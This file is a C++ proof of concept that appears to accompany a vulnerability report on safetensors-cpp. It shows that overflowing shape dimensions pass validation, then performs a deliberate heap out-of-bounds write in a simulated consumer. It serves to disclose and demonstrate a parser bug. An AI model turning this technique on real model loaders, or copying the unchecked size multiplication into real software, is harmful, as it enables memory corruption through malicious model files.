/** * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow * * This simulates what a real consumer of safetensors-cpp would do: * 1. Load a safetensors file * 2. Get tensor shape * 3. Allocate buffer based on shape size * 4. Copy/iterate data using shape dimensions * * The malicious file has shape dimensions that overflow, so: * - Buffer allocation uses overflowed (small) size * - Data iteration uses shape dimensions that imply huge size * - Result: heap buffer overflow * * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc * Run: ./crash_overflow overflow_tensor.safetensors */ #include #include #include #include #include #include #include "safetensors.hh" /** * Simulated consumer function: reshape tensor data according to declared shape. * This is what ML frameworks typically do after loading a safetensors file. */ void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) { // A real consumer would use shape to determine iteration bounds size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype); // Compute total elements from shape (uses the SAME vulnerable multiplication) size_t total_elements = safetensors::get_shape_size(tensor); // overflows to 4 // Allocate output buffer based on computed size size_t buf_size = total_elements * dtype_bytes; // 4 * 4 = 16 bytes printf(" Allocating buffer: %zu bytes\n", buf_size); float *output = (float *)malloc(buf_size); if (!output) { printf(" malloc failed\n"); return; } // Copy the data - this is "safe" because both use the same overflowed size // But the SHAPE is what matters for downstream processing memcpy(output, data + tensor.data_offsets[0], buf_size); printf(" Buffer allocated and filled: %zu bytes\n", buf_size); // NOW: A consumer iterates using shape dimensions for processing // e.g., for reshaping, transposing, or element-wise operations // This is where the overflow becomes dangerous printf(" Shape claims %zu x %zu x %zu = way more than %zu elements\n", tensor.shape[0], tensor.shape[1], tensor.shape[2], total_elements); // Demonstrate: iterate first dimension only to show OOB access // Even just iterating shape[0] (4194305) exceeds our 4-element buffer printf(" Iterating shape[0]=%zu elements (but buffer only has %zu)...\n", tensor.shape[0], total_elements); // This writes beyond the allocated buffer -> HEAP OVERFLOW // ASan will catch this immediately for (size_t i = 0; i < tensor.shape[0] && i < 100; i++) { output[i] = 0.0f; // OOB write starting at index 4 } printf(" OOB write triggered (ASan should report heap-buffer-overflow)\n"); free(output); } int main(int argc, char *argv[]) { const char *filepath = "overflow_tensor.safetensors"; if (argc > 1) filepath = argv[1]; printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n"); // Load file std::ifstream ifs(filepath, std::ios::binary | std::ios::ate); if (!ifs.is_open()) { fprintf(stderr, "Failed to open %s\n", filepath); return 1; } size_t filesize = ifs.tellg(); ifs.seekg(0); std::vector data(filesize); ifs.read(reinterpret_cast(data.data()), filesize); ifs.close(); // Parse safetensors::safetensors_t st; std::string warn, err; bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err); if (!ok) { printf("FAILED to load: %s\n", err.c_str()); return 1; } // Validate (this passes due to overflow) std::string val_err; if (!safetensors::validate_data_offsets(st, val_err)) { printf("Validation failed: %s\n", val_err.c_str()); return 1; } printf("[+] File loaded and validated successfully\n"); printf("[*] Processing tensors...\n\n"); // Process each tensor for (size_t i = 0; i < st.tensors.size(); i++) { std::string key = st.tensors.keys()[i]; safetensors::tensor_t tensor; st.tensors.at(i, &tensor); printf("Processing tensor '%s':\n", key.c_str()); process_tensor(tensor, st.storage.data()); } return 0; }